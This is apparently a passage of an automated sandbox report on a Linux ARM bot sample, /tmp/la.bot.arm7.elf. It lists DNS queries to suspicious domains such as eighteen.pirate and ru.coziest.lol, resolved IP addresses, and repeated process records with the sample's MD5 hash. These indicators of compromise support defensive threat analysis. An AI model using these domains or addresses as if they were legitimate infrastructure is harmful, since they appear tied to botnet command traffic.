                                                      Oct 27, 2024 07:33:21.456017017 CET53374908.8.8.8192.168.2.14
                                                      Oct 27, 2024 07:33:21.457709074 CET4042053192.168.2.148.8.8.8
                                                      Oct 27, 2024 07:33:21.465728045 CET53404208.8.8.8192.168.2.14
                                                      Oct 27, 2024 07:33:21.467161894 CET4819953192.168.2.148.8.8.8
                                                      Oct 27, 2024 07:33:21.474132061 CET53481998.8.8.8192.168.2.14
                                                      Oct 27, 2024 07:33:21.475730896 CET6004753192.168.2.148.8.8.8
                                                      Oct 27, 2024 07:33:21.482470036 CET53600478.8.8.8192.168.2.14
                                                      Oct 27, 2024 07:33:22.487890959 CET5699753192.168.2.14162.243.19.47
                                                      Oct 27, 2024 07:33:22.580884933 CET5356997162.243.19.47192.168.2.14
                                                      TimestampSource IPDest IPChecksumCodeType
                                                      Oct 27, 2024 07:33:16.431332111 CET54.36.111.116192.168.2.146585(Port unreachable)Destination Unreachable
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 27, 2024 07:33:02.676706076 CET192.168.2.148.8.8.80x251fStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                      Oct 27, 2024 07:33:02.676752090 CET192.168.2.148.8.8.80x1d4fStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                      Oct 27, 2024 07:33:11.197981119 CET192.168.2.14161.97.219.840xa7efStandard query (0)nineteen.libre. [malformed]256423false
                                                      Oct 27, 2024 07:33:16.411154985 CET192.168.2.14116.203.104.2030xed1cStandard query (0)75cents.libre. [malformed]256428false
                                                      Oct 27, 2024 07:33:16.424355030 CET192.168.2.1454.36.111.1160x441eStandard query (0)75cents.libre. [malformed]256428false
                                                      Oct 27, 2024 07:33:21.439856052 CET192.168.2.148.8.8.80xbb6Standard query (0)ru.coziest.lol. [malformed]256433false
                                                      Oct 27, 2024 07:33:21.448448896 CET192.168.2.148.8.8.80xbb6Standard query (0)ru.coziest.lol. [malformed]256433false
                                                      Oct 27, 2024 07:33:21.457709074 CET192.168.2.148.8.8.80xbb6Standard query (0)ru.coziest.lol. [malformed]256433false
                                                      Oct 27, 2024 07:33:21.467161894 CET192.168.2.148.8.8.80xbb6Standard query (0)ru.coziest.lol. [malformed]256433false
                                                      Oct 27, 2024 07:33:21.475730896 CET192.168.2.148.8.8.80xbb6Standard query (0)ru.coziest.lol. [malformed]256433false
                                                      Oct 27, 2024 07:33:22.487890959 CET192.168.2.14162.243.19.470x7495Standard query (0)eighteen.pirateA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 27, 2024 07:33:02.684672117 CET8.8.8.8192.168.2.140x251fNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                      Oct 27, 2024 07:33:02.684672117 CET8.8.8.8192.168.2.140x251fNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                      Oct 27, 2024 07:33:22.580884933 CET162.243.19.47192.168.2.140x7495No error (0)eighteen.pirate103.253.147.242A (IP address)IN (0x0001)false
                                                      Oct 27, 2024 07:33:22.580884933 CET162.243.19.47192.168.2.140x7495No error (0)eighteen.pirate154.205.128.136A (IP address)IN (0x0001)false

                                                      System Behavior

                                                      Start time (UTC):06:33:00
                                                      Start date (UTC):27/10/2024
                                                      Path:/tmp/la.bot.arm7.elf
                                                      Arguments:/tmp/la.bot.arm7.elf
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):06:33:00
                                                      Start date (UTC):27/10/2024
                                                      Path:/tmp/la.bot.arm7.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):06:33:00
                                                      Start date (UTC):27/10/2024
                                                      Path:/tmp/la.bot.arm7.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):06:33:00
                                                      Start date (UTC):27/10/2024
                                                      Path:/tmp/la.bot.arm7.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):06:33:00
                                                      Start date (UTC):27/10/2024
                                                      Path:/tmp/la.bot.arm7.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):06:34:05
                                                      Start date (UTC):27/10/2024
                                                      Path:/tmp/la.bot.arm7.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):06:34:05
                                                      Start date (UTC):27/10/2024
                                                      Path:/tmp/la.bot.arm7.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):06:34:53
                                                      Start date (UTC):27/10/2024
                                                      Path:/tmp/la.bot.arm7.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                      Start time (UTC):06:34:53
                                                      Start date (UTC):27/10/2024
                                                      Path:/tmp/la.bot.arm7.elf
                                                      Arguments:-
                                                      File size:4956856 bytes
                                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1